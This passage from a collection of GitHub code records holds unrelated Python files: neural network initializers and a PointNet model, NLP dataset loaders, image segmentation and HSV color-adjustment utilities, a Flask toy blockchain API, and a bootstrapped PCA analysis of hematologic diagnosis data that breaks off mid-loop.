This won't work perfectly,\n # but it covers almost all use cases where this initialiser\n # would be expected to be useful, i.e in large linear and\n # convolutional layers, as the last dimension will almost\n # always be the output size.\n for dimension in list(tensor.size())[:-1]:\n size *= dimension\n\n activation_scaling = torch.nn.init.calculate_gain(nonlinearity, tensor)\n max_value = math.sqrt(3 / size) * activation_scaling\n\n return tensor.uniform_(-max_value, max_value)\n\n\ndef block_orthogonal(tensor: torch.Tensor,\n split_sizes: List[int],\n gain: float = 1.0) -> None:\n \"\"\"\n An initializer which allows initializing model parameters in \"blocks\". This is helpful\n in the case of recurrent models which use multiple gates applied to linear projections,\n which can be computed efficiently if they are concatenated together. However, they are\n separate parameters which should be initialized independently.\n Parameters\n ----------\n tensor : ``torch.Tensor``, required.\n A tensor to initialize.\n split_sizes : List[int], required.\n A list of length ``tensor.ndim()`` specifying the size of the\n blocks along that particular dimension. E.g. ``[10, 20]`` would\n result in the tensor being split into chunks of size 10 along the\n first dimension and 20 along the second.\n gain : float, optional (default = 1.0)\n The gain (scaling) applied to the orthogonal initialization.\n \"\"\"\n data = tensor.data\n sizes = list(tensor.size())\n if any([a % b != 0 for a, b in zip(sizes, split_sizes)]):\n raise ConfigurationError(\"tensor dimensions must be divisible by their respective \"\n \"split_sizes. Found size: {} and split_sizes: {}\".format(sizes, split_sizes))\n indexes = [list(range(0, max_size, split))\n for max_size, split in zip(sizes, split_sizes)]\n # Iterate over all possible blocks within the tensor.\n for block_start_indices in itertools.product(*indexes):\n # A list of tuples containing the index to start at for this block\n # and the appropriate step size (i.e split_size[i] for dimension i).\n index_and_step_tuples = zip(block_start_indices, split_sizes)\n # This is a tuple of slices corresponding to:\n # tensor[index: index + step_size, ...]. This is\n # required because we could have an arbitrary number\n # of dimensions. The actual slices we need are the\n # start_index: start_index + step for each dimension in the tensor.\n block_slice = tuple([slice(start_index, start_index + step)\n for start_index, step in index_and_step_tuples])\n data[block_slice] = torch.nn.init.orthogonal_(tensor[block_slice].contiguous(), gain=gain)\n\n\ndef zero(tensor: torch.Tensor) -> None:\n return tensor.data.zero_()\n\ndef lstm_hidden_bias(tensor: torch.Tensor) -> None:\n \"\"\"\n Initialize the biases of the forget gate to 1, and all other gates to 0,\n following Jozefowicz et al., An Empirical Exploration of Recurrent Network Architectures\n \"\"\"\n # gates are (b_hi|b_hf|b_hg|b_ho) of shape (4*hidden_size)\n tensor.data.zero_()\n hidden_size = tensor.shape[0] // 4\n tensor.data[hidden_size:(2 * hidden_size)] = 1.0\n","repo_name":"jcyk/gtos","sub_path":"generator_data/stog/modules/initializers.py","file_name":"initializers.py","file_ext":"py","file_size_in_byte":6493,"program_lang":"python","lang":"en","doc_type":"code","stars":183,"dataset":"github-code","pt":"37"} +{"seq_id":"20677046343","text":"# // Write a function called sameFrequency. 
Given two positive integers, find out if the two numbers have the same frequency of digits.\n\n# // Your solution MUST have the following complexities:\n\n# // Time: O(N)\n\n# // Sample Input:\n\n# // sameFrequency(182,281) // true\n# // sameFrequency(34,14) // false\n# // sameFrequency(3589578, 5879385) // true\n# // sameFrequency(22,222) // false\n\n\ndef sameFrequency(num1, num2):\n    freq = {}\n\n    str_num1 = str(num1)\n    str_num2 = str(num2)\n\n    if len(str_num1) != len(str_num2):\n        return False\n\n    for digit1, digit2 in zip(str_num1, str_num2):\n        if digit1 in freq:\n            freq[digit1] += 1\n        else:\n            freq[digit1] = 1\n\n        if digit2 in freq:\n            freq[digit2] -= 1\n        else:\n            # unseen digits from num2 must start at -1 so matched pairs cancel to 0\n            freq[digit2] = -1\n\n    for value in freq.values():\n        if value != 0:\n            return False\n\n    return True\n","repo_name":"jonnynotbravo/DS-Algos","sub_path":"sameFrequency.py","file_name":"sameFrequency.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6375556365","text":"# The generator send() method\ndef range2(n):\n\n    count = 0\n    while count < n:\n        print('count', count)\n        count += 1\n        sign = yield count\n        if sign == 'stop':\n            break\n        print(\"---sign\", sign)\n    return 3333\n\n\nnew_range = range2(3)  # 0,1,2\nn1 = next(new_range)\nprint(new_range)\n# n2 = next(new_range)\nnew_range.send(\"stop\")\n# The send() method:\n# 1. wakes the generator and resumes execution\n# 2. delivers a value into the generator\n","repo_name":"hqs2212586/startMyPython3.0","sub_path":"第三章-文件操作和函数/函数/函数生成器2.py","file_name":"函数生成器2.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"3581138796","text":"\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n\n\"\"\"\n### Build a model\nEach convolution and fully-connected layer (except for the end layers) consists of\nConvolution / Dense -> Batch Normalization -> ReLU Activation.\n\"\"\"\n\n\ndef conv_bn(x, filters):\n    x = layers.Conv1D(filters, kernel_size=1, padding=\"valid\")(x)\n    x = layers.BatchNormalization(momentum=0.0)(x)\n    return layers.Activation(\"relu\")(x)\n\n\ndef dense_bn(x, filters):\n    x = layers.Dense(filters)(x)\n    x = layers.BatchNormalization(momentum=0.0)(x)\n    return layers.Activation(\"relu\")(x)\n\n\n\"\"\"\nPointNet consists of two core components. The primary MLP network, and the transformer\nnet (T-net). The T-net aims to learn an affine transformation matrix by its own mini\nnetwork. The T-net is used twice. The first time to transform the input features (n, 3)\ninto a canonical representation. The second is an affine transformation for alignment in\nfeature space (n, 3). As per the original paper we constrain the transformation to be\nclose to an orthogonal matrix (i.e. 
||X*X^T - I|| = 0).\n\"\"\"\n\n\nclass OrthogonalRegularizer(keras.regularizers.Regularizer):\n    def __init__(self, num_features, l2reg=0.001):\n        self.num_features = num_features\n        self.l2reg = l2reg\n        self.eye = tf.eye(num_features)\n\n    def __call__(self, x):\n        x = tf.reshape(x, (-1, self.num_features, self.num_features))\n        xxt = tf.tensordot(x, x, axes=(2, 2))\n        xxt = tf.reshape(xxt, (-1, self.num_features, self.num_features))\n        return tf.reduce_sum(self.l2reg * tf.square(xxt - self.eye))\n\n\n\"\"\"\n We can then define a general function to build T-net layers.\n\"\"\"\n\n\ndef tnet(inputs, num_features):\n\n    # Initialise bias as the identity matrix\n    bias = keras.initializers.Constant(tf.reshape(tf.eye(num_features),[-1,1]))\n    reg = OrthogonalRegularizer(num_features)\n\n    x = conv_bn(inputs, 32)\n    x = conv_bn(x, 64)\n    x = conv_bn(x, 512)\n    x = layers.GlobalMaxPooling1D()(x)\n    x = dense_bn(x, 256)\n    x = dense_bn(x, 128)\n    x = layers.Dense(\n        num_features * num_features,\n        kernel_initializer=\"zeros\",\n        bias_initializer=bias,\n        activity_regularizer=reg,\n    )(x)\n    feat_T = layers.Reshape((num_features, num_features))(x)\n    # Apply affine transformation to input features\n    return layers.Dot(axes=(2, 1))([inputs, feat_T])\n\n\n\"\"\"\nThe main network can then be implemented in the same manner, where the T-net mini models\ncan be dropped in as layers in the graph. Here we replicate the network architecture\npublished in the original paper but with half the number of weights at each layer as we\nare using the smaller 10 class ModelNet dataset.\n\"\"\"\ndef pointnet(num_points, num_class):\n    inputs = keras.Input(shape=(num_points, 3))\n\n    x = tnet(inputs, 3)\n    x = conv_bn(x, 32)\n    x = conv_bn(x, 32)\n    x = tnet(x, 32)\n    x = conv_bn(x, 32)\n    x = conv_bn(x, 64)\n    x = conv_bn(x, 512)\n    x = layers.GlobalMaxPooling1D()(x)\n    x = dense_bn(x, 256)\n    x = layers.Dropout(0.3)(x)\n    x = dense_bn(x, 128)\n    x = layers.Dropout(0.3)(x)\n\n    outputs = layers.Dense(num_class, activation=\"softmax\")(x)\n\n    model = keras.Model(inputs=inputs, outputs=outputs, name=\"pointnet\")\n\n    return model\n","repo_name":"YipengHu/MPHY0043","sub_path":"tutorials/pointset/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
+{"seq_id":"32879671828","text":"import re\nimport numpy as np\nimport torch\n\ndef clean_str(text,TREC=False):\n\treturn text\n\n\ndatapath = '../Datasets/'\nvecpath = '../glove.840B.300d.txt'\n\ndef loadrt():\n\tcorpus = []\n\tposcount = 0\n\tnegcount = 0\n\twith open(datapath+'rt-polarity/rt-polarity.pos','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tposcount+=1\n\n\twith open(datapath+'rt-polarity/rt-polarity.neg','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tnegcount+=1\n\n\tlabels = np.zeros(poscount+negcount)\n\tlabels[:poscount] = 1\n\tprint(\"Training Data Loaded\")\n\treturn corpus,labels\n\n\ndef loadso():\n\tcorpus = []\n\tposcount = 0\n\tnegcount = 0\n\twith open(datapath+'Subj_Obj/plot.tok.gt9.5000','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tposcount+=1\n\n\twith open(datapath+'Subj_Obj/quote.tok.gt9.5000','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tnegcount+=1\n\n\tlabels = 
np.zeros(poscount+negcount)\n\tlabels[:poscount] = 1\n\treturn corpus,labels\n\n\ndef loadmpqa():\n\tcorpus = []\n\tposcount = 0\n\tnegcount = 0\n\twith open(datapath+'mpqa/mpqa.pos','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tposcount+=1\n\n\twith open(datapath+'mpqa/mpqa.neg','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tnegcount+=1\n\n\tlabels = np.zeros(poscount+negcount)\n\tlabels[:poscount] = 1\n\treturn corpus,labels\n\n\ndef loadcr():\n\tcorpus = []\n\tposcount = 0\n\tnegcount = 0\n\twith open(datapath+'cr/custrev.pos','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tposcount+=1\n\n\twith open(datapath+'cr/custrev.neg','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\tcorpus.append(clean_str(line[:-1]))\n\t\t\tnegcount+=1\n\n\tlabels = np.zeros(poscount+negcount)\n\tlabels[:poscount] = 1\n\treturn corpus,labels\n\n\ndef loadtrec():\n\tlab = {'DESC':0,'ENTY':1,'ABBR':2,'HUM':3,'LOC':4,'NUM':5}\n\n\tXtrain = []\n\tytrain = []\n\twith open(datapath+'TREC/train.txt','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\twords = line.split()\n\t\t\tlabel = words[0][0:words[0].find(\":\")]\n\t\t\tsentence = \" \".join(words[1:])\n\t\t\tytrain.append(int(lab[label]))\n\t\t\tXtrain.append(clean_str(sentence,True))\n\n\tXtest = []\n\tytest = []\n\twith open(datapath+'TREC/test.txt','r',encoding='latin1') as f:\n\t\tfor line in f.readlines():\n\t\t\twords = line.split()\n\t\t\tlabel = words[0][0:words[0].find(\":\")]\n\t\t\tsentence = \" \".join(words[1:])\n\t\t\tytest.append(int(lab[label]))\n\t\t\tXtest.append(clean_str(sentence,True))\n\n\treturn Xtrain,np.asarray(ytrain),Xtest,np.asarray(ytest)\n\n\ndef load_embeddings():\n\n\tembedding_index = {}\n\twith open(vecpath,'r',encoding='utf-8') as f:\n\t\tfor line in f.readlines():\n\t\t\twords = line.split()\n\t\t\tword = words[0]\n\t\t\tvector = torch.FloatTensor(np.asarray(words[1:],'float32'))\n\t\t\tembedding_index[word] = vector\n\n\t\tembed_dim = vector.size(0)\n\n\treturn embedding_index,embed_dim","repo_name":"avinashsai/Convolutional-Neural-Networks-for-Text-Classification","sub_path":"PyTorch/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"43572257737","text":"import time\nimport os\nimport sys\nfrom typing import List\nfrom multiprocessing import Pool\n\nimport numpy as np\nfrom skimage import img_as_float\nfrom skimage.morphology import remove_small_objects\n# scipy.misc.imsave was removed in SciPy 1.2; imageio's imwrite is a drop-in here\nfrom imageio import imwrite as imsave\n\nfrom frangi_filter import get_frangi\nfrom frangi_filter import get_thresholded\n# pylint: disable=C0413\nsys.path.append('.')\nfrom data_utils import zero_one\n\n\ndef ensure_dir_exists(dir_path):\n    if not os.path.exists(dir_path):\n        print('Creating', dir_path)\n        os.makedirs(dir_path)\n\n\ndef segment_image(image, frangi_settings: list, small_object_threshold: int,\n                  image_id=None) -> np.ndarray:\n    \"\"\" runs the whole segmentation pipeline\n    image_id is used for caching, leave as None to disable cache\n    \"\"\"\n    frangi_sigma_max, frangi_beta1, frangi_beta2, frangi_threshold = frangi_settings\n\n    frangi_output = get_frangi(image_id, image, [frangi_sigma_max,\n                                                 frangi_beta1, frangi_beta2])\n\n    segmented = get_thresholded(frangi_output, frangi_threshold)\n\n    segmented = 
remove_small_objects(np.round(segmented).astype(bool),\n small_object_threshold)\n\n segmented = zero_one(segmented)\n return segmented\n\n\n\ndef produce_segmentations(segment_params, images, image_names, output_dir) -> None:\n \"\"\"\n Segment each image found in images with params and save\n them to the output_folder\n image_paths should be absolute paths\n \"\"\"\n\n if not os.path.isdir(output_dir):\n print(f\"Creating {output_dir}\")\n os.makedirs(output_dir)\n\n params = np.array(segment_params)\n frangi_settings = params[:4]\n small_object_threshold = params[4]\n for photo, name in zip(images, image_names):\n seg_start = time.time()\n segmented = segment_image(photo,\n frangi_settings,\n small_object_threshold=small_object_threshold)\n print('Segmentation duration:', time.time() - seg_start)\n out_path = os.path.join(output_dir, name)\n print('Saving', out_path)\n imsave(out_path, img_as_float(segmented))\n\n\ndef segment_im_wrapper(args):\n \"\"\" convenient wrapper to convert the CMA-ES\n friendly param list into arguments that can be called\n by segment_image \"\"\"\n idx, photo, params = args\n frangi_settings = params[:4]\n object_threshold = params[4]\n return segment_image(np.array(photo), frangi_settings,\n small_object_threshold=object_threshold,\n image_id=idx)\n\n\ndef produce_segmentations_pool(segment_params, images) -> List[np.ndarray]:\n \"\"\"\n Similar to produce_segmentations but uses multiprocessing instead.\n Also this function returns the segmented images instead of saving them to disk\n \"\"\"\n inputs = []\n for i, image in enumerate(images):\n inputs.append([i, np.array(image), np.array(segment_params)])\n\n with Pool(len(images)) as pool:\n segmented_images = pool.map(segment_im_wrapper, inputs)\n assert len(segmented_images) == len(images)\n return segmented_images\n\n\ndef save_segmentations_pool(segment_params, images, image_names, output_dir) -> None:\n \"\"\"\n Similar to produce_segmentations_pool but saves them to disk\n \"\"\"\n if not os.path.isdir(output_dir):\n raise Exception(f\"{output_dir} needs to exist for segmentations to be output\")\n\n inputs = []\n for i, image in enumerate(images):\n inputs.append([i, np.array(image), np.array(segment_params)])\n\n with Pool(len(images)) as pool:\n segmented_images = pool.map(segment_im_wrapper, inputs)\n\n for image, name in zip(segmented_images, image_names):\n out_path = os.path.join(output_dir, name)\n print('Saving', out_path)\n imsave(out_path, img_as_float(image))\n","repo_name":"Abe404/segmentation_of_roots_in_soil_with_unet","sub_path":"src/frangi/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"24372538689","text":"# coding: utf-8\nimport json\nfrom flask import Flask, Response, request, jsonify\nfrom uuid import uuid4\nfrom fiblockchain.blockchain import Blockchain\n\n\n# Flask APP\napp = application = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\n\n# (global) ノードのユニークなアドレスを作成\nnode_identifire = str(uuid4()).replace('-', '')\n# blockchain = Blockchain()\nblockchain = Blockchain(\"blockchain.bak\")\n\n\n@app.route(\"/test\", methods=[\"GET\"])\ndef test():\n return Response(json.dumps({'Output': 'Hello Test'}), mimetype='application/json', status=200)\n\n\n@app.route(\"/test\", methods=['POST'])\ndef test_post():\n data = {\"Output\": \"Hello Test\"}\n return Response(json.dumps(data), mimetype='application/json', 
@app.route('/transactions/new', methods=['POST'])\ndef new_transactions():\n values = request.get_json()\n\n required = ['sender', 'recipient', 'amount']\n if not all(k in values for k in required):\n return 'Missing values', 400\n\n index = blockchain.new_tansaction(\n values['sender'],\n values['recipient'],\n values['amount'])\n\n response = {'message': f'The transaction has been added to block {index}',\n 'Output': 'Hello Test'\n }\n return jsonify(response)\n # return Response(json.dumps(response), mimetype='application/json', status=200)\n\n\n@app.route('/mine', methods=['GET'])\ndef mine():\n # Use the proof-of-work algorithm to find the next proof\n last_block = blockchain.last_block\n last_proof = last_block['proof']\n proof = blockchain.proof_of_work(last_proof)\n\n # Get a reward for finding the proof\n # The sender is \"0\" to signify that the miner has mined a new coin\n blockchain.new_tansaction(\n sender=\"0\",\n recipient=node_identifire,\n amount=1,\n )\n\n # Mine the new block by adding it to the chain\n block = blockchain.new_block(proof)\n\n # Return the mining result to the user\n response = {\n 'message': 'Mined a new block',\n 'index': block['index'],\n 'transactions': block['transactions'],\n 'proof': block['proof'],\n 'previous_hash': block['previous_hash'],\n }\n\n return jsonify(response), 200\n\n\n@app.route('/chain', methods=['GET'])\ndef full_chain():\n response = {\n 'chain': blockchain.chain,\n 'length': len(blockchain.chain)\n }\n return jsonify(response), 200\n\n\n@app.route('/nodes/register', methods=['POST'])\ndef register_node():\n values = request.get_json()\n\n nodes = values.get('nodes')\n if nodes is None:\n return \"Error: not a valid list of nodes\", 400\n\n for node in nodes:\n blockchain.register_node(node)\n\n response = {\n 'message': 'New nodes have been added',\n 'total_nodes': list(blockchain.nodes)\n }\n return jsonify(response), 201\n\n\n@app.route('/nodes/resolve', methods=['GET'])\ndef consensus():\n replaced = blockchain.resolve_conflicts()\n\n if replaced:\n response = {\n 'message': 'The chain was replaced',\n 'new_chain': blockchain.chain\n }\n else:\n response = {\n 'message': 'The chain was confirmed',\n 'chain': blockchain.chain\n }\n\n return jsonify(response), 200\n\n\nif __name__ == \"__main__\":\n import sys\n # print(\"[EXAMPLE] python application.py 0.0.0.0 8000\")\n host = sys.argv[1]\n port = sys.argv[2]\n # print(sys.argv)\n # app.run(host=\"0.0.0.0\", port=8000, debug=True)\n app.run(host, port, True)\n","repo_name":"peace098beat/blockchain-flask","sub_path":"fiblockchain/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"72306285546","text":"from PIL import Image\nimport numpy as np\n\ndef gerar_matriz_aux ( M ):\n matriz_zero = np.zeros( [ M.shape[0] , M.shape[1] , 3 ] )\n\n return matriz_zero\n\ndef rgbPixel(h, s, v):\n\n sf = float(s/100)\n vf = float(v/100)\n \n c = vf * sf\n x = c * (1 - abs((h/60)%2 - 1))\n m = vf - c\n\n r1, g1, b1 = 0, 0, 0\n if(0 <= h < 60):\n r1, g1, b1 = c, x, 0\n elif(60 <= h < 120):\n r1, g1, b1 = x, c, 0\n elif(120 <= h < 180):\n r1, g1, b1 = 0, c, x\n elif(180 <= h < 240):\n r1, g1, b1 = 0, x, c\n elif(240 <= h < 300):\n r1, g1, b1 = x, 0, c\n elif(300 <= h < 360):\n r1, g1, b1 = c, 0, x\n\n r, g, b = ((r1+m)*255, (g1+m)*255, (b1+m)*255)\n return round(r), round(g), round(b)\n\ndef hsvPixel(r, g, b):\n r, g, b = r/255.0, g/255.0, b/255.0\n\n mx = max(r, g, b)\n mn = min(r, g, b)\n df = mx-mn\n\n if df == 0:\n h = 0\n elif mx == r: \n h = (60 * (((g-b)/df) % 6))\n elif mx == g:\n h = (60 * (((b-r)/df) + 2))\n elif mx == b:\n h = (60 * (((r-g)/df) + 4))\n 
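# mx == 0 means pure black; saturation is defined as 0 there to avoid dividing by zero\n 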
if mx == 0:\n s = 0\n else:\n s = (df/mx)\n v = mx\n\n\n return round(h), int(s*100), int(v*100)\n\ndef hsvArray(imgArray):\n imgHSV = gerar_matriz_aux(imgArray)\n #img = Image.fromarray(imgArray)\n img = imgArray\n\n\n #Rewrite the pixels in HSV\n #for x in range(img.width):\n #for y in range(img.height):\n for x in range( img.shape[1] ):\n for y in range( img.shape[0] ):\n #r, g, b = img.getpixel((x, y))\n r, g, b = img[ y, x, : ]\n #print(img.getpixel((y, x)))\n #print(hsvPixel(r, g, b))\n imgHSV[y, x, :] = hsvPixel(r, g, b)\n\n return imgHSV\n\ndef rgbArray(imgHsvArray):\n rgbArray = gerar_matriz_aux(imgHsvArray)\n\n #Rewrite the pixels in RGB, converting pixel by pixel\n for x in range(imgHsvArray.shape[0]):\n for y in range(imgHsvArray.shape[1]):\n h, s, v = imgHsvArray[x, y, :]\n rgbArray[x, y, :] = rgbPixel(h, s, v)\n return rgbArray\n\ndef ajustarSat(imgHSV, newSat):\n\n #Calculations in hsv\n for x in range(imgHSV.shape[0]):\n for y in range(imgHSV.shape[1]):\n h, s, v = imgHSV[x, y, :]\n #Check whether the pixel is a pure shade of gray\n if(s == 0):\n s = s\n #Clamp the values and apply the saturation change\n elif(s + newSat > 100):\n s = 100\n elif(s + newSat <= 0):\n s = 1\n else:\n s = s + newSat\n imgHSV[x, y, :] = h, s, v\n\n #Convert back to rgb\n rgb = rgbArray(imgHSV)\n img = Image.fromarray(rgb.astype( np.uint8 ), 'RGB')\n return img \n\ndef ajustarValor(imgHSV, newVal):\n\n #Calculations in hsv\n for x in range(imgHSV.shape[0]):\n for y in range(imgHSV.shape[1]):\n h, s, v = imgHSV[x, y, :]\n #Clamp the values and apply the value change\n if(v + newVal > 100):\n v = 100\n elif(v + newVal < 0):\n v = 0\n else:\n v = v + newVal\n imgHSV[x, y, :] = h, s, v\n\n #Convert back to rgb\n rgb = rgbArray(imgHSV)\n img = Image.fromarray(rgb.astype( np.uint8 ), 'RGB')\n return img\n\ndef ajustarMatiz(imgHSV, newHue):\n\n #Calculations in hsv\n for x in range(imgHSV.shape[0]):\n for y in range(imgHSV.shape[1]):\n h, s, v = imgHSV[x, y, :]\n #Apply the hue change\n h = (h + newHue)%360\n imgHSV[x, y, :] = h, s, v\n\n #Convert back to rgb\n rgb = rgbArray(imgHSV)\n img = Image.fromarray(rgb.astype( np.uint8 ), 'RGB')\n return img","repo_name":"icaroslb/proc_img_ck0167","sub_path":"Processador_imagens/rgbHsv.py","file_name":"rgbHsv.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"39597634786","text":"from sklearn.metrics import roc_auc_score\nfrom sklearn import metrics\nfrom sklearn.preprocessing import label_binarize\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.models import Model\nfrom keras.models import load_model\nfrom sklearn.model_selection import StratifiedKFold\nimport tensorflow as tf\nfrom sklearn.utils import resample\nimport sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.decomposition import PCA\nimport joblib\n\n#input_data\ninput_file=\"../data-2022-03-02.xlsx\"\n#patient_total\npatient_total=1192\n\ndefault_method=\"main analysis\"\n#default_method=\"dim_select\"\n\nif default_method == \"main analysis\":\n #if bootstrapping\n if_bootstrap=1\n bs_start=0\n total_bs_rounds=100\n # if cross_validation_test\n if_cv=0\n # if cross_validation_test and output auc for each diagnosis\n detailed_auc_trigger=0\n #neurons to iterate\n neu_start=65\n neu_end=neu_start+1\n\nif default_method == \"dim_select\":\n #if bootstrapping\n 
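# dim_select mode: sweep hidden-layer widths over the full data (no bootstrap, no CV) to pick a layer size\n 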
if_bootstrap=0\n bs_start=0\n total_bs_rounds=1\n # if cross_validation_test\n if_cv=0\n # if cross_validation_test and output auc for each diagnosis\n detailed_auc_trigger=0\n #neurons to iterate\n neu_start=30\n neu_end=100\n\n#stabilization purpose\nseed=4\n#epochs\nepo=100\n#pre-defined mapping of diagnoses\nn_classes = 8\nlabels = [0, 1, 2, 3, 4, 5, 6, 7]\nid_to_disease ={0:\"MPN\",\n 1:\"MDS\",\n 2:\"MDS/MPN\",\n 3:\"CLL\",\n 4:\"AML\",\n 5:\"ALL\",\n 6:\"MM\",\n 7:\"CML\"}\ncv_out_path=\"../output/cv_stats/\"\n\nnp.random.seed(seed)\ntf.random.set_seed(seed)\nauc_for_each_diag = {}\n\nfor diag_id in range(n_classes):\n auc_for_each_diag[id_to_disease[diag_id]] = []\n\ndef mkdir(pa):\n if not os.path.exists(pa):\n os.makedirs(pa)\nmkdir(\"../output/cv_stats\")\nmkdir(\"../output/bs_data\")\nmkdir(\"../output/hidden_layer_out\")\nmkdir(\"../output/2d_full_data\")\nmkdir(\"../output/big_graph\")\nmkdir(\"../output/dim_sel\")\nmkdir(\"../output/model\")\n\n\nbs_cv_result_file = open(cv_out_path+\"cv_result.csv\", \"w\")\nbs_cv_result_file.write(\"hidden_unit,bootstrapping_round,overall_auc,auc1,auc2,auc3,auc4,auc5\\n\")\n\n#generate PCA projections and draw the patient graph (raw version)\ndef pca_and_pic(filename,neu_units,sampled_bs_file,bs_round):\n hidden_layer_out_file=filename\n full_name=filename.split(\"/\")[-1]\n output_file=\"../output/2d_full_data/\"+full_name.split(\".xlsx\")[0]+\"_2d.xlsx\"\n\n #read hidden layer\n df = pd.read_excel(hidden_layer_out_file)\n x=df\n x=np.array(x)\n #PCA projection\n pca_model= PCA(n_components=2,random_state=2)\n X_reduced = pca_model.fit_transform(x)\n #save pca parameters\n joblib.dump(pca_model, \"../output/model/{}_bs{}_pca.m\".format(neu_units,bs_round))\n\n data=pd.DataFrame(X_reduced)\n data.columns=[\"0\",\"1\"]\n #add to the end of the input data for later analysis\n all_data=pd.read_excel(sampled_bs_file).copy(deep=True)\n all_data[\"X\"]=data[\"0\"]\n all_data[\"Y\"]=data[\"1\"]\n all_data.to_excel(output_file)\n #generate pictures\n gen_pic(output_file,neu_units,bs_round)\n\n\n#draw the patient graph (raw version)\ndef gen_pic(filename,neu_units,bs_round):\n df = pd.read_excel(filename)\n id_to_disease={\n 0:\"MPN\",\n 1:\"MDS\",\n 2:\"MDS/MPN\",\n 3:\"CLL\",\n 4:\"AML\",\n 5:\"ALL\",\n 6:\"MM\",\n 7:\"CML\"}\n plt.clf()\n fig, ax = plt.subplots(nrows=1, ncols=1)\n ax.set_facecolor('white')\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS']\n plt.rcParams['axes.unicode_minus'] = False\n df2=df\n xx=0.3\n d=df2[df2[\"disease_id\"]==0]\n plt.scatter(d[\"X\"],d[\"Y\"],c='r',s=xx,label = id_to_disease[0])\n d=df2[df2[\"disease_id\"]==1]\n plt.scatter(d[\"X\"],d[\"Y\"],c='g',s=xx,label = id_to_disease[1])\n d=df2[df2[\"disease_id\"]==2]\n plt.scatter(d[\"X\"],d[\"Y\"],c='b',s=xx,label = id_to_disease[2])\n d=df2[df2[\"disease_id\"]==3]\n plt.scatter(d[\"X\"],d[\"Y\"],c='lime',s=xx,label = id_to_disease[3])\n d=df2[df2[\"disease_id\"]==4]\n plt.scatter(d[\"X\"],d[\"Y\"],c='#fac205',s=xx,label = id_to_disease[4])\n d=df2[df2[\"disease_id\"]==5]\n plt.scatter(d[\"X\"],d[\"Y\"],c='#a00498',s=xx,label = id_to_disease[5])\n d=df2[df2[\"disease_id\"]==6]\n plt.scatter(d[\"X\"],d[\"Y\"],c='#3af1fe',s=xx,label = id_to_disease[6])\n d=df2[df2[\"disease_id\"]==7]\n plt.scatter(d[\"X\"],d[\"Y\"],c='hotpink',s=xx,label = id_to_disease[7])\n plt.legend(markerscale=3,loc=\"upper right\", prop={'size': 7})\n plt.title(\"overview -{}\".format(neu_units))\n plt.xlabel('PC1')\n plt.ylabel('PC2')\n 
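# one overview scatter is written per (hidden width, bootstrap round) pair\n 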
plt.savefig('../output/big_graph/overview_100_{}_bs_{}.jpg'.format(neu_units,bs_round), dpi=500)\n plt.close()\n#main process\nfor neu_units in range(neu_start,neu_end):\n #bootstrapping\n for current_bs_round in range(bs_start,total_bs_rounds):\n input_data = pd.read_excel(input_file)\n input_data[\"disease_id\"]=input_data[\"Diagnosis\"].replace({value:key for key, value in id_to_disease.items()})\n sampled_bootstrapping_file = \"../output/bs_data/{}.xlsx\".format(current_bs_round)\n if if_bootstrap and current_bs_round!=0:\n bootstrapSamples = resample(input_data, n_samples=patient_total, replace=1)\n bootstrapSamples.to_excel(sampled_bootstrapping_file,index=False)\n all_data=pd.read_excel(sampled_bootstrapping_file)\n else:\n all_data=input_data\n input_data.to_excel(sampled_bootstrapping_file, index=False)\n #generate training data\n X_train = all_data\n X_train = X_train.drop([\"ID\"], axis=1)\n X_train = X_train.drop([\"Diagnosis\"], axis=1)\n X_train = X_train.drop([\"Sex\"], axis=1)\n X_train = X_train.drop([\"disease_id\"], axis=1)\n X_train = X_train.drop([\"MRD (for AML)\"], axis=1)\n X_train = X_train.drop([\"2017 ELN risk score (for AML)\"], axis=1)\n X_train = X_train.drop([\"M3 (for AML)\"], axis=1)\n X_train = X_train.drop([\"2016 WHO category (for MDS)\"], axis=1)\n X_train = X_train.drop([\"IPSS-R score (for MDS)\"], axis=1)\n X_train = X_train.drop([\"CR after 6 cycles of chemotherapy (for MDS)\"], axis=1)\n X_train = X_train.drop([\"AML type\"], axis=1)\n X_train = X_train.drop([\"treatment\"], axis=1)\n \n y_train=all_data[\"disease_id\"]\n #test data is the same since we use all patients to generate the following projections\n X_test = X_train.copy(deep=True)\n y_test = y_train.copy(deep=True)\n #data for cross validation purpose\n 